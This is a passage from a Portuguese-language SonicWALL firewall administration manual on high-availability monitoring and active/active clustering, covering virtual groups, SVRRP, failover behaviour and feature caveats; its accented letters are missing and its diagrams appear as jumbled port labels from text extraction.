Etapa 7 Marque a caixa de seleo Permitir gerenciamento em endereo IP primrio/secundrio.
Quando essa opo est habilitada para uma interface, um cone verde aparece na coluna
Gerenciamento da interface na tabela Configuraes de monitoramento na pgina Alta
disponibilidade > Monitoramento. O gerenciamento s permitido em uma interface quando
essa opo est habilitada.
Etapa 8 No campo Endereo IP de lgica/investigao, digite o endereo IP de um dispositivo
downstream na rede LAN que deve ser monitorada para conectividade. Normalmente, dever
ser um servidor ou roteador downstream. (Se a investigao for desejada no lado da WAN,
deve ser usado um dispositivo upstream.) Os dispositivos Primrio e Secundrio efetuaro
ping regularmente a este endereo IP de investigao. Se ambos conseguirem efetuar ping
com xito ao destino, no ocorrer failover. Se nenhum conseguir efetuar ping ao destino com
xito, no ocorre failover, pois presume-se que o problema est relacionado com o destino e
no com os firewalls. Se um dispositivo conseguir efetuar ping ao destino, mas o outro no
conseguir, ocorrer failover no dispositivo que consegue efetuar ping ao destino.
Os campos Endereo IPv4 primrio e Endereo IPv4 secundrio devem ser configurados
com endereos IP independentes em uma interface de LAN, como X0 (ou uma interface de
WAN, como X1, para investigao na WAN), para permitir que a investigao lgica funcione
corretamente.
Etapa 9 Opcionalmente, para especificar manualmente o endereo MAC virtual da interface, selecione
Substituir MAC virtual e digite o endereo MAC no campo. O formato do endereo MAC de
seis pares de nmeros hexadecimais separados por dois pontos, como A1:B2:C3:d4:e5:f6.
necessrio cuidado ao escolher o endereo MAC virtual para evitar erros de configurao.
Quando a caixa de seleo Habilitar MAC virtual for marcada na pgina Alta disponibilidade
> Avanado, o firmware do SonicOS gera automaticamente um endereo MAC virtual para
todas as interfaces. A permisso de gerao do endereo MAC virtual pelo firmware do
SonicOS elimina a possibilidade de erros de configurao e garante a exclusividade do
endereo MAC virtual, o que impede possveis conflitos.
Etapa 11 Para configurar o monitoramento em qualquer uma das outras interfaces, repita as etapas
acima.
Etapa 12 Quando terminar todas as configuraes de Alta disponibilidade, clique em Aceitar. Todas as
configuraes sero sincronizadas automaticamente com a unidade Em espera.

Clustering ativo/ativo
Um Cluster ativo/ativo formado por uma coleo de Ns de cluster. Um n de cluster pode
consistir em um par de AD estvel, um par de AD sem estado ou uma unidade autnoma. A
sincronizao de estado dinmico s est disponvel em um n de cluster se este for um par
de AD estvel. O protocolo de alta disponibilidade tradicional ou o protocolo de AD estvel da
SonicWALL usado para comunicao dentro do n de cluster, entre as unidades no par de
AD.
Quando um n de cluster um par de AD estvel, a DPI ativa/ativa pode ser habilitada dentro
do n do cluster para aumentar o desempenho.
Com o Clustering ativo/ativo, voc pode atribuir determinados fluxos de trfego para cada n
no cluster, fornecendo compartilhamento de carga alm de redundncia e suportando uma
velocidade de processamento muito maior sem um nico ponto de falha.
Viso geral do Clustering ativo/ativo na pgina 1114
Pr-requisitos de Clustering ativo/ativo na pgina 1127
Configurar a alta disponibilidade de clustering ativo/ativo na pgina 1129
Configurar alta disponibilidade de clustering de DPI ativo/ativo na pgina 1134
Configurar VPN e NAT com Clustering ativo/ativo na pgina 1136
Definindo configuraes da interface e DHCP de rede na pgina 1143
Malha completa de clustering ativo/ativo na pgina 1148
Viso geral do Clustering ativo/ativo

Esta seo fornece uma apresentao do recurso Clustering ativo/ativo. Com o Clustering
ativo/ativo, voc pode atribuir determinados fluxos de trfego para cada n no cluster,
fornecendo compartilhamento de carga alm de redundncia e suportando uma velocidade de
processamento muito maior sem um nico ponto de falha.
Uma instalao tpica recomendada inclui quatro firewalls do mesmo modelo SonicWALL
configurado como dois Ns de cluster, em que cada n consiste em um par de AD estvel. Para
implantaes maiores, o cluster pode incluir oito firewalls, configurados como quatro Ns de
cluster (ou pares de AD). Dentro de cada N do cluster, a AD estvel mantm o estado
dinmico sincronizado para failover perfeito sem perda de dados em um nico ponto de falha.
A AD estvel no necessria, mas altamente recomendvel para obter melhor desempenho
durante o failover.
O compartilhamento de carga executado configurando diferentes Ns de cluster como
gateways diferentes em sua rede. Normalmente, isso tratado por outro dispositivo
downstream (mais prximo dos dispositivos de LAN) do Cluster ativo/ativo, como um servidor
DHCP ou um roteador.
Um N de cluster tambm pode ser um nico firewall, permitindo que uma configurao de
Cluster ativo/ativo seja criada usando dois firewalls. No caso de uma condio de falha em um
dos firewalls nesta implantao, o failover no estvel porque nenhum firewall no N de
cluster tem uma AD Secundria.

A redundncia obtida em vrios nveis com Clustering ativo/ativo:
O cluster fornece Ns de cluster redundantes e cada um deles pode manipular os fluxos
de trfego de qualquer outro N de cluster se ocorrer uma falha.
O N de cluster consiste em um par de AD estvel, no qual o firewall Secundrio pode
assumir as funes da unidade Primria no caso de falha.
A redundncia de portas, na qual uma porta no utilizada atribuda como uma secundria
a outra porta, oferece proteo no nvel da interface sem a necessidade de failover para
outro n ou firewall.
A DPI ativa/ativa pode ser habilitada, fornecendo maior velocidade de processamento em
cada n de cluster.

Exemplo: Clustering ativo/ativo implantao de quatro unidades na pgina 1116
Exemplo: Clustering ativo/ativo implantao de duas unidades na pgina 1117
Benefcios do Clustering ativo/ativo na pgina 1118
Como funciona o Clustering ativo/ativo? na pgina 1118
Informaes de suporte do recurso com Clustering ativo/ativo na pgina 1124

Exemplo: Clustering ativo/ativo implantao de quatro unidades
Este diagrama mostra um cluster de quatro unidades. Cada n de cluster contm um par de
AD. As portas de AD designadas dos quatro dispositivos esto conectadas a um switch de
camada 2. Essas portas so usadas para as mensagens de estado de monitoramento enviadas
atravs de SVRRP e gerenciamento de n de cluster e para sincronizao de configurao. As
duas unidades em cada par de AD tambm esto conectadas entre si por meio de outra
interface (mostrada como a interface "Xn"). Esta a Interface de DPI ativa/ativa necessria
para DPI ativa/ativa. Com a DPI ativa/ativa habilitada, determinados pacotes so
descarregados para a unidade em espera do par de AD para processamento de DPI.
Figura 22 Cluster de quatro unidades ativo/ativo
Internet
Cluster Node 1 Cluster Node 2

X1 X1
Primary Primary
Cluster Link1
10GE 1GE 1GE
Xn Xn 10GE 1GE 1GE
X18 X16 X14 X12 X10 X8 X6 X4 X2 X0 X18 X16 X14 X12 X10 X8 X6 X4 X2 X0
SDHC SDHC
M0 M0
ALARM
BYPASS ALARM
BYPASS
STATUS STATUS
TEST TEST
SonicWALL SuperMassive 9200 PWR 1 PWR 2

MGMT X19 X17 X15 X13 X11 X9 X7 X5 X3 X1 SonicWALL SuperMassive 9200 PWR 1 PWR 2
MGMT X19 X17 X15 X13 X11 X9 X7 X5 X3 X1
Xn Xn
CONSOLE CONSOLE
Co
HA Data HA Control nt HA Data HA Control
ro
X3
Interface X3
Interface lL
ink
X3
Interface X3
Interface
1
Xn Xn Xn Xn
2
ink
lL
ro
nt
Xn Xn Co Xn Xn
Xn Xn
X18
10GE
X16 X14 X12
1GE
X10 X8 X6 X4
1GE
X2 X0
Cluster Link 2 X18
10GE
X16 X14 X12
1GE
X10 X8 X6 X4
1GE
X2 X0
Xn Xn
SDHC SDHC
M0 M0
ALARM
BYPASS ALARM
BYPASS
STATUS STATUS
TEST TEST
SonicWALL SuperMassive 9200 CONSOLE

PWR 1 PWR 2
MGMT X19 X17 X15 X13 X11 X9 X7 X5 X3 X1 SonicWALL SuperMassive 9200 CONSOLE
PWR 1 PWR 2
MGMT X19 X17 X15 X13 X11 X9 X7 X5 X3 X1
Secondary Secondary
X0 X0
Internal Network
Xn
Router Switch Interface
Para obter mais informaes sobre portas redundantes e switches redundantes fisicamente
conectados, consulte Active/Active Clustering Full Mesh Deployment Technote (Nota tcnica
de implantao de malha completa de clustering ativo/ativo).

Exemplo: Clustering ativo/ativo implantao de duas unidades
Este diagrama mostra um cluster de duas unidades. Em um cluster de duas unidades no so
usados pares de AD. Em vez disso, cada n de cluster contm um nico dispositivo. As portas
de AD designadas nos dois dispositivos so conectadas diretamente entre si por meio de um
cabo transversal. O SVRRP (SonicWALL Virtual Router Redundancy Protocol Protocolo de
redundncia de roteador virtual da SonicWALL) usa esta conexo de porta de AD para enviar
mensagens de estado de monitoramento e gerenciamento de n de cluster. As mensagens de
gerenciamento de SVRRP so iniciadas no n mestre e as informaes de monitoramento so
comunicadas de cada dispositivo no cluster. A conexo da porta de AD tambm usada para
a sincronizao de configurao entre ns de cluster.
Figura 23 Cluster de duas unidades ativo/ativo
Internet
Cluster Node 1 X1 Cluster Node 2 X1
10GE 1GE 1GE 10GE 1GE 1GE

SDHC SDHC
M0 M0
ALARM
BYPASS ALARM
BYPASS
STATUS STATUS
TEST TEST

PWR 1 PWR 2
PWR 1 PWR 2
MGMT X19 X17 X15 X13 X11 X9 X7 X5 X3 X1
X0 HA HA X0
Internal Network
Router
Switch
X0, X1, HA Physical Ports

Benefcios do Clustering ativo/ativo
Os benefcios do Clustering ativo/ativo incluem o seguinte:
Todos os firewalls no cluster so utilizados para derivar velocidade de processamento
mxima
Pode ser executado em conjunto com DPI ativa/ativa para executar o processamento
simultneo de servios IPS, GAV, Anti-spyware e Regras de aplicativos que so os mais
intensos ao nvel de processador, no firewall em espera em cada par de AD enquanto o
firewall ativo executa outro processamento
O compartilhamento de carga suportado, permitindo a atribuio de fluxos de trfego
especfico para cada n no cluster
Todos os ns no cluster fornecem redundncia para outros ns, manipulando o trfego
conforme necessrio se outros ns ficarem inativos
A redundncia de interface fornece o secundrio para fluxo de trfego sem a necessidade
de failover
As implantaes de malha completa e malha no completa so suportadas
Como funciona o Clustering ativo/ativo?

H vrios conceitos importantes que so apresentados para Clustering ativo/ativo. Consulte as
sees a seguir para obter descries sobre esses novos conceitos e alteraes na
funcionalidade existente:
Sobre ns de cluster na pgina 1118
Sobre o Cluster na pgina 1118
Sobre Grupos virtuais na pgina 1120
Sobre SVRRP na pgina 1122
Sobre o failover na pgina 1122
Sobre DPI com Clustering ativo/ativo na pgina 1123
Sobre Monitoramento de alta disponibilidade com ativo/clustering na pgina 1123
Sobre implantaes de malha completa na pgina 1148
Sobre ns de cluster
Um Cluster ativo/ativo formado por uma coleo de Ns de cluster. Um n de cluster pode
consistir em um par de AD estvel, um par de AD sem estado ou uma unidade autnoma. A
sincronizao de estado dinmico s est disponvel em um n de cluster se este for um par
de AD estvel. O protocolo de alta disponibilidade tradicional ou o protocolo de AD estvel da
SonicWALL usado para comunicao dentro do n de cluster, entre as unidades no par de
AD.
Quando um n de cluster um par de AD estvel, a DPI ativa/ativa pode ser habilitada dentro
do n do cluster para aumentar o desempenho.
Sobre o Cluster
Todos os dispositivos no cluster devem ser do mesmo modelo de produto e estar executando
a mesma verso de firmware.
Dentro do cluster, todas as unidades esto conectadas e se comunicam entre si. Para
comunicao entre ns de cluster, usado um novo protocolo denominado Protocolo de
redundncia de roteador virtual da SonicWALL (SVRRP). As mensagens de estado de
monitoramento e gerenciamento de n de cluster so enviadas usando SVRRP.

Todos os ns de cluster compartilham a mesma configurao, a qual sincronizada pelo n
mestre. O n mestre tambm responsvel por sincronizar firmware para os outros ns no
cluster. A conexo de porta de AD usada para sincronizar atualizaes de firmware e
configurao.
O estado dinmico no est sincronizado nos ns de cluster, mas somente dentro de um n
de cluster. Quando um n de cluster contm um par de AD, a AD estvel pode ser habilitada
no n de cluster, com as vantagens de sincronizao de estado dinmico e failover estvel,
conforme necessrio. Em caso de falha de um n de cluster inteiro, o failover ficar sem
estado. Isso significa que devem ser redefinidas conexes de rede j existentes. Por exemplo,
as sesses Telnet e FTP devem ser restabelecidas e os tneis de VPN devem ser
renegociados.
A seo Sobre o failover na pgina 1122 fornece mais informaes sobre como funciona o
failover.
O nmero mximo de ns de cluster em um cluster est atualmente limitado a quatro. Se cada
n de cluster for um par de AD, o cluster incluir oito firewalls.
Figura 24 Cluster de dois ns ativo/ativo
Internet

X1 X1
Primary Primary
Cluster Link1
10GE 1GE 1GE
Xn Xn 10GE 1GE 1GE
SDHC SDHC
M0 M0
ALARM
BYPASS ALARM
BYPASS
STATUS STATUS
TEST TEST

MGMT X19 X17 X15 X13 X11 X9 X7 X5 X3 X1 SonicWALL SuperMassive 9200 PWR 1 PWR 2
MGMT X19 X17 X15 X13 X11 X9 X7 X5 X3 X1
Xn Xn
CONSOLE CONSOLE
Co
HA Data HA Control nt HA Data HA Control
ro
X3
Interface X3
Interface lL
ink
X3
Interface X3
Interface
1
Xn Xn Xn Xn
k 2
l Lin
ro
nt
Xn Xn Co Xn Xn
Xn Xn
X18
10GE
X16 X14 X12
1GE
X10 X8 X6 X4
1GE
X2 X0
Cluster Link 2 X18
10GE
X16 X14 X12
1GE
X10 X8 X6 X4
1GE
X2 X0
Xn Xn
SDHC SDHC
M0 M0
ALARM
BYPASS ALARM
BYPASS
STATUS STATUS
TEST TEST

PWR 1 PWR 2
PWR 1 PWR 2
MGMT X19 X17 X15 X13 X11 X9 X7 X5 X3 X1
Secondary Secondary
X0 X0
Internal Network
Xn
Aes permitidas no cluster

Os tipos de aes administrativas que so permitidas diferem com base no estado do firewall
no cluster. Todas as aes so permitidas para usurios administradores com privilgios
apropriados no firewall ativo do n mestre, inclusive todas as aes de configurao. Um
subconjunto de aes permitido no firewall ativo de ns no mestre e at mesmo menos

aes so permitidas em firewalls no estado em espera. A Tabela 11 lista as aes permitidas
para firewalls ativos de ns no mestre e firewalls em espera no cluster.
Tabela 11 Aes administrativas permitidas
Ao administrativa No mestre ativo Em espera

Aes de somente leitura Permitido Permitido
Registro no MySonicWALL Permitido Permitido
Sincronizao de licenas com o Gerenciador de licenas da Permitido Permitido
SonicWALL
Ferramentas de diagnstico em Sistema > Diagnstico Permitido Permitido
Captura de pacote Permitido Permitido
Sincronizar configuraes de AD (sincroniza configuraes Permitido No permitido
para o ponto de AD dentro do n)
Sincronizar firmware de AD (sincroniza o firmware para o Permitido No permitido
ponto de AD dentro do n)
Logout administrativo de usurios Permitido No permitido
Testes de autenticao (como LDAP de teste, RADIUS de Permitido No permitido
teste, Agente de autenticao de teste)
Sobre Grupos virtuais

O Clustering ativo/ativo tambm suporta o conceito de Grupos virtuais. Atualmente,
suportado um mximo de quatro Grupos virtuais.
Um Grupo Virtual um conjunto de endereos IP virtuais para todas as interfaces configuradas
na configurao do cluster (as interfaces no utilizadas/no atribudas no tm endereos IP
virtuais). Quando o Clustering ativo/ativo habilitado pela primeira vez, os endereos IP
configurados para as interfaces nesse firewall so convertidos em endereos IP virtuais para
o Grupo virtual 1. Assim, o Grupo virtual 1 incluir endereos IP virtuais para X0, X1 e
quaisquer outras interfaces que so configuradas e atribudas a uma zona.
Um Grupo virtual tambm pode ser considerado como um grupo lgico de fluxos de trfego
dentro de um contexto de failover, em que pode ocorrer failover no grupo lgico de fluxos de
trfego de um n para outro, dependendo das condies de falha encontradas. Cada Grupo
virtual possui um n de cluster atuando como o proprietrio e um ou mais ns de cluster
atuando como em espera. Um Grupo virtual somente pertence a um n de cluster por vez e
esse n se torna o proprietrio de todos os endereos IP virtuais associados a esse Grupo
virtual. O proprietrio do Grupo virtual 1 designado como o n mestre e responsvel por
sincronizar a configurao e o firmware para os outros ns do cluster. Se o n do proprietrio
de um Grupo virtual encontrar uma condio de falha, um dos ns em espera se tornar o
proprietrio.
Como parte da configurao de Clustering ativo/ativo, os nmeros de srie de outros firewalls
no cluster so inseridos na interface de gerenciamento do SonicOS e um nmero de
classificao da ordem de espera atribudo a cada um. Quando a configurao de Clustering
ativo/ativo aplicada, so criados at trs Grupos virtuais adicionais, correspondentes aos ns
de cluster adicionais, mas os endereos IP virtuais no so criados para esses Grupos virtuais.
Voc precisa configurar esses endereos IP virtuais na pgina Rede > Interfaces.
Existem dois fatores na determinao da propriedade de Grupo virtual (qual o n de cluster
que ter a propriedade de Grupo virtual):

Classificao do n de cluster a classificao est configurada na interface de
gerenciamento do SonicOS para especificar a prioridade de cada n para assumir a
propriedade de um Grupo virtual.
Peso do link do grupo virtual dos ns do cluster este o nmero de interfaces no
Grupo virtual que esto funcionando e que tm um endereo IP virtual configurado.
Quando mais de dois ns de cluster so configurados em um cluster, esses fatores determinam
o n de cluster que tem melhores capacidades para assumir a propriedade do Grupo virtual.
Em um cluster com dois ns de cluster, em que um deles tem uma falha, naturalmente o outro
assumir a propriedade.
O SVRRP usado para comunicar o status do link e o status de propriedade do Grupo virtual
para todos os ns de cluster no cluster.
O proprietrio do Grupo virtual 1 designado como o N mestre. As alteraes de
configurao e as atualizaes de firmware so somente permitidas no n mestre, o qual usa
SVRRP para sincronizar a configurao e o firmware para todos os ns no cluster. Em uma
determinada interface, os endereos IP virtuais do Grupo virtual 1 devem ser configurados
antes de outros Grupos virtuais poderem ser configurados.
Suporte de mltiplos gateways e compartilhamento de carga

O trfego do Grupo virtual processado somente pelo n do proprietrio. Um pacote que
chega em um Grupo virtual deixar o firewall no mesmo Grupo virtual. Em uma configurao
tpica, cada n de cluster pertence a um Grupo virtual e, portanto, processa o trfego
correspondente a um Grupo virtual.
Essa funcionalidade do Grupo virtual suporta um modelo de mltiplos gateways com
redundncia. Em uma implantao com dois ns de cluster, o endereo IP do Grupo virtual 1
de X0 pode ser um gateway e o endereo IP do Grupo virtual 2 de X0 pode ser outro gateway.
o administrador da rede que determina como o trfego alocado a cada gateway. Por
exemplo, voc pode usar um servidor DHCP inteligente que distribui a alocao de gateway
para os PCs na rede do cliente diretamente conectada ou voc pode usar rotas baseadas em
poltica em um roteador downstream.
Quando o Clustering ativo/ativo est habilitado, o servidor DHCP interno do SonicOS est
desativado e no pode ser habilitado. As redes que precisam de um servidor DHCP podem
usar um servidor DHCP externo que reconhece vrios gateways, para que a alocao de
gateway possa ser distribuda.
Nota Quando o Clustering ativo/ativo est habilitado, o servidor DHCP interno do SonicOS est
desativado.
Efeito nas pginas de configurao relacionadas

Quando o Clustering ativo/ativo habilitado inicialmente, os endereos IP existentes para
todas as interfaces configuradas so automaticamente convertidos em endereos IP virtuais
para o Grupo virtual 1. Quando o Grupo virtual 1 ou qualquer Grupo virtual criado, os objetos
de interface padro so criados para endereos IP virtuais com nomes apropriados, como
"Grupo virtual 1" ou "Grupo virtual 2". A mesma interface pode ter vrios endereos IP virtuais,
um para cada Grupo virtual que configurado. Voc pode visualizar esses endereos IP
virtuais na pgina Rede > Interfaces.
Nota Todos os ns de cluster no Cluster ativo/ativo compartilham a mesma configurao

Um endereo MAC virtual est associado a cada endereo IP virtual em uma interface e
gerado automaticamente pelo SonicOS. O endereo MAC virtual criado no formato 00-17-c5-
6a-XX-YY, em que XX o nmero da interface, como "03" para a porta X3, e YY o nmero
de grupo interno, como "00" para Grupo virtual 1 ou "01" para Grupo virtual 2.
Nota O endereo MAC virtual ativo/ativo diferente do endereo MAC virtual de alta
disponibilidade. A funcionalidade de endereo MAC virtual de alta disponibilidade no
suportada quando o Clustering ativo/ativo est habilitado.
As polticas de NAT so criadas automaticamente para os objetos de interface afetados de

cada Grupo virtual. Essas polticas de NAT estendem-se a polticas de NAT existentes de
interfaces especficas para as interfaces virtuais correspondentes. Voc pode visualizar essas
polticas de NAT na pgina Rede > Polticas de NAT. As polticas de NAT adicionais podem ser
configuradas conforme necessrio e podem ser personalizadas para um Grupo virtual, se
desejado.
Depois de o Clustering ativo/ativo ser habilitado, voc deve selecionar o nmero do Grupo
virtual durante a configurao ao adicionar uma poltica de VPN.
Sobre SVRRP
Para comunicao entre ns de cluster em um Cluster ativo/ativo, usado um novo protocolo
denominado Protocolo de redundncia de roteador virtual da SonicWALL (SVRRP). As
mensagens de estado de monitoramento e gerenciamento do n de cluster so enviadas
usando SVRRP atravs dos links de Cluster ativo/ativo.
O SVRRP tambm usado para sincronizar as alteraes de configurao, atualizaes de
firmware e atualizaes de assinatura a partir do n mestre para todos os ns no cluster. Em
cada n de cluster, somente a unidade ativa processa as mensagens de SVRRP.
No caso de falha dos Links de cluster ativo/ativo, as mensagens de pulsao do SVRRP so
enviadas na interface X0. No entanto, enquanto os Links de cluster ativo/ativo estiverem
inativos, a configurao no ser sincronizada. As atualizaes de firmware ou assinatura,
alteraes a polticas e outras alteraes de configurao no podem ser sincronizadas com
outros ns de cluster at que os Links de cluster ativo/ativo sejam corrigidos.
Sobre o failover
Existem dois tipos de failover que podem ocorrer quando o Clustering ativo/ativo est
habilitado:
Failover de alta disponibilidade dentro de um par de AD, a unidade Secundria assume
a funo de Primria. Se a AD estvel estiver habilitada para o par, ocorre o failover sem
interrupo para conexes de rede.
Failover ativo/ativo se todas as unidades no n de proprietrio de um Grupo virtual
encontrarem uma condio de falha, o n em espera do Grupo virtual assume a
propriedade do Grupo virtual. O Failover ativo/ativo transfere a propriedade de um Grupo
virtual de um N de cluster para outro. O N do cluster que se torna o proprietrio do Grupo
virtual tambm se torna o proprietrio de todos os endereos IP virtuais associados ao
Grupo virtual e comea usando os endereos MAC virtuais correspondentes.
O Failover ativo/ativo est sem estado, o que significa que as conexes de rede sero
redefinidas e os tneis de VPN devem ser renegociados. As difuses de camada 2 informam os
dispositivos de rede da alterao na topologia, pois o n de cluster, que o novo proprietrio
de um Grupo virtual, gera solicitaes de ARP com os MACs virtuais para os endereos IP virtuais
de propriedade recente. Isso simplifica consideravelmente o processo de failover, pois apenas
os switches conectados precisam atualizar suas tabelas de aprendizado. Todos os outros

dispositivos de rede continuam a usar os mesmos endereos MAC virtuais e no precisam
atualizar suas tabelas de ARP porque o mapeamento entre os endereos IP virtuais e os
endereos MAC virtuais no quebrado.
Quando o failover de alta disponibilidade e o failover ativo/ativo so possveis, o failover de AD
tem precedncia sobre o failover ativo/ativo pelas seguintes razes:
O failover de AD pode ser estvel, enquanto o failover ativo/ativo sem estado.
O firewall em espera em um par de AD est ligeiramente carregado e tem recursos
disponveis para assumir o processamento necessrio, embora ele talvez j esteja
manipulando o trfego de DPI se a DPI ativa/ativa estiver habilitada. O n de cluster
alternativo pode j estar processando trfego semelhante em quantidade para a unidade
com falha e pode ficar sobrecarregado aps o failover.
O Failover ativo/ativo sempre opera no modo de preempo ativo/ativo. O modo de preempo
significa que, aps o failover entre dois ns de cluster, o n do proprietrio original do Grupo
virtual assumir a funo ativa a partir do n em espera aps o n do proprietrio ter sido
restaurado para um estado operacional verificado. O proprietrio original ter uma prioridade
mais alta para um Grupo virtual devido sua classificao superior se todas as interfaces de
IP virtuais estiverem ativas e o peso do link for o mesmo entre os dois ns de cluster.
Sobre DPI com Clustering ativo/ativo

A DPI ativa/ativa pode ser usada com o Clustering ativo/ativo. Quando a DPI ativa/ativa estiver
habilitada, ela utiliza o firewall em espera no par de AD para processamento de DPI.
Para melhorar o desempenho em um Cluster ativo/ativo, a habilitao da DPI ativa/ativa
recomendada, pois ela utiliza o firewall em espera no par de AD para processamento de DPI
(Deep Packet Inspection Inspeo profunda de pacotes).
Sobre Monitoramento de alta disponibilidade com ativo/clustering

Quando o Clustering ativo/ativo est habilitado, a configurao do monitoramento de AD
suportada para o par de AD em cada n de cluster. Os recursos de monitoramento de AD so
consistentes com as verses anteriores. O monitoramento de AD pode ser configurado para o
monitoramento do link/fsico e para o monitoramento de investigao/lgico. Depois de efetuar
logon no n mestre, a configurao de monitoramento precisa ser adicionada em uma base
por n na pgina Alta disponibilidade > Monitoramento.
Nota A pgina Alta disponibilidade > Monitoramento se aplica somente ao par de AD ao qual voc
est conectado, no a todo o cluster.
O monitoramento de interface fsica habilita a deteco de link para as interfaces monitoradas.

O link detectado na camada fsica para determinar a viabilidade do link.
Quando o monitoramento de interface fsica est habilitado, com ou sem monitoramento lgico
habilitado, o failover de AD prevalece sobre o failover ativo/ativo. Se um link falhar ou uma
porta estiver desconectada na unidade ativa, a unidade em espera no par de AD ficar ativa.
Nota Para interfaces com endereos IP virtuais configurados, o monitoramento fsico ativo/ativo
est implcito e usado para calcular o peso do link do Grupo virtual. O monitoramento
fsico no pode ser desabilitado para essas interfaces. Isso diferente do monitoramento
de AD.

O monitoramento lgico envolve a configurao de SonicOS para monitorar um dispositivo
confivel em uma ou mais das redes conectadas. A falha de comunicao peridica com o
dispositivo pela unidade ativa no par de AD disparar um failover na unidade em espera. Se
no for possvel conectar nenhuma unidade no par de AD ao dispositivo, ser considerado que
o problema est relacionado com o dispositivo e no ocorrer failover.
Se o monitoramento fsico e o monitoramento lgico estiverem desabilitados, o failover ativo/
ativo ocorrer na desconexo de porta ou falha do link.
Os endereos IP Primrio e Secundrio configurados na pgina Alta disponibilidade >
Monitoramento podem ser configurados em interfaces de LAN ou WAN e so usados para
diversos fins:
Como endereos de gerenciamento independentes para cada unidade,
independentemente do status Ativo ou Em espera da unidade (suportada em todas as
interfaces fsicas)
Para permitir a sincronizao de licenas entre a unidade em espera e o servidor de
licenciamento SonicWALL
Como endereos IP de origem para os pings de investigao enviados durante o
monitoramento lgico
A configurao de endereos IP de monitoramento para ambas as unidades no par de AD
permite que voc efetue logon em cada unidade de forma independente para fins de
gerenciamento. Observe que o trfego de no gerenciamento ignorado se for enviado para
um dos endereos IP de monitoramento. Os endereos IP de LAN exclusivos dos firewalls
Primrio e Secundrio no podem atuar como um gateway ativo; todos os sistemas
conectados LAN interna precisaro usar um endereo IP de LAN virtual como gateway.
Nota Quando os endereos IP de monitoramento/gerenciamento de AD so configurados apenas

em interfaces de WAN, eles precisam ser configurados em todas as interfaces de WAN para
as quais um endereo IP virtual foi configurado.
O endereo IP de gerenciamento da unidade Secundria usado para permitir a sincronizao

de licenas com o servidor de licenciamento do SonicWALL que lida com licenciamento em
uma base por dispositivo (no por par de AD). Mesmo se a unidade em espera j tiver sido
registrada em MySonicWALL antes de criar a associao de AD, voc deve usar o link na
pgina Sistema > Licenas para se conectar ao servidor SonicWALL ao acessar o dispositivo
Secundrio por meio de seu endereo IP de gerenciamento. Isso permite a sincronizao de
licenas (como a licena de Clustering ativo/ativo ou de AD estvel) entre a unidade em espera
e o servidor de licenciamento SonicWALL.
Ao usar o monitoramento lgico, o par de AD executar ping ao destino especificado do
endereo IP de investigao lgico a partir do Primrio e tambm do SonicWALL Secundrio.
O endereo IP definido no campo Endereo IP primrio ou Endereo IP secundrio usado
como o endereo IP de origem para o ping. Se as duas unidades conseguirem efetuar ping
com xito ao destino, no ocorrer failover. Se no conseguirem efetuar ping com xito ao
destino, no ocorrer failover, pois os SonicWALLs assumiro que o problema est
relacionado com o destino e no com os SonicWALLs. Se um SonicWALL conseguir efetuar
ping ao destino, mas o outro no conseguir, ocorrer failover do par de AD no SonicWALL que
consegue efetuar ping ao destino.
As tarefas de configurao na pgina Alta disponibilidade > Monitoramento so realizadas na
unidade Primria e, em seguida, so sincronizadas automaticamente para a Secundria.
Informaes de suporte do recurso com Clustering ativo/ativo

As sees a seguir fornecem informaes de suporte do recurso sobre o Clustering ativo/ativo:

Advertncias de recurso na pgina 1125
Compatibilidade com verses anteriores na pgina 1125
Compatibilidade com SonicPoint na pgina 1125
Compatibilidade do balanceamento de carga da WAN na pgina 1125
Topologia de roteamento e compatibilidade de protocolo na pgina 1126
Advertncias de recurso
Quando o Clustering ativo/ativo est habilitado, somente os endereos IP estticos podem ser
usados na WAN.
Os seguintes recursos no so suportados quando o Clustering ativo/ativo est habilitado:
Servidor DHCP
Modo transparente de camada 3
Ponte de camada 2/Modo transparente de camada 2
DNS dinmico
Modo com fio
Os seguintes recursos so suportados somente no Grupo virtual 1:
SonicWALL GVC
SonicOS SSL VPN
Auxiliar de IP
Compatibilidade com verses anteriores

O recurso de Clustering ativo/ativo no compatvel com verses anteriores. Ao atualizar para
o SonicOS de uma verso anterior que no suportava Clustering ativo/ativo, altamente
recomendvel que voc desabilite a Alta disponibilidade antes de exportar as preferncias de
um par de AD executando uma verso anterior do SonicOS. As preferncias podem ento ser
importadas sem conflitos potenciais aps a atualizao.
Compatibilidade com SonicPoint

Existem dois pontos a considerar ao usar SonicWALL SonicPoints com Clustering ativo/ativo:
Os SonicPoints somente se comunicam com o n mestre para fazer download de firmware
e outros aspectos de operao.
Os SonicPoints precisam de acesso a um servidor DHCP independente. Os SonicPoints
exigem um servidor DHCP para fornecer endereos IP a clientes sem fio, mas o servidor
DHCP do SonicOS incorporado desabilitado automaticamente quando o Clustering ativo/
ativo est habilitado.
Compatibilidade do balanceamento de carga da WAN

Quando o Balanceamento de carga da WAN (WLB) est habilitado em um Cluster ativo/ativo,
a mesma configurao da interface de WLB usada para todos os ns no cluster.
Uma falha de interface de WAN pode disparar um failover WLB, um failover de par de AD ou
um failover ativo/ativo para outro n de cluster, dependendo do seguinte:
A WAN fica inativa de forma lgica devido falha na investigao de WLB failover WLB
A WAN fsica fica inativa enquanto o Monitoramento fsico est habilitado failover de par
de AD
A WAN fsica fica inativa enquanto o Monitoramento fsico no estiver habilitado failover
ativo/ativo

Topologia de roteamento e compatibilidade de protocolo
Esta seo descreve as limitaes atuais e os requisitos especiais para configuraes de
Clustering ativo/ativo em relao topologia de roteamento e aos protocolos de roteamento.
Suporte de ponte de camada 2

As interfaces de ponte de camada 2 no so suportadas em uma configurao de cluster.
Suporte de OSPF
O OSPF compatvel com Clustering ativo/ativo. Quando habilitado, o OSPF executado nas
interfaces habilitadas por OSPF de cada n de cluster ativo. De uma perspectiva de
roteamento, todos os ns de cluster aparecem como roteadores paralelos, cada um com o
endereo IP virtual da interface do n do cluster. Em geral, qualquer rede anunciada por um
n ser anunciada por todos os outros ns.
O ID do roteador do OSPF de cada n de cluster deve ser exclusivo e ser derivado do ID do
roteador configurado no n mestre da seguinte forma:
Se o usurio inserir 0 ou 0.0.0.0 para o ID do roteador na configurao do OSPF, o ID do
roteador de cada n ser atribudo ao endereo IP virtual de X0 do n.
Se o usurio inserir qualquer valor diferente de 0 ou 0.0.0.0 para o ID do roteador, ser
atribudo a cada n um ID do roteador com valores consecutivos incrementados em um
para cada n. Por exemplo, em um cluster de 4 ns, se o ID do roteador 10.0.0.1 foi
configurado no n mestre, os IDs do roteador atribudos devem ser os seguintes:
N 1: 10.0.0.1
N 2: 10.0.0.2
N 3: 10.0.0.3
N 4: 10.0.0.4
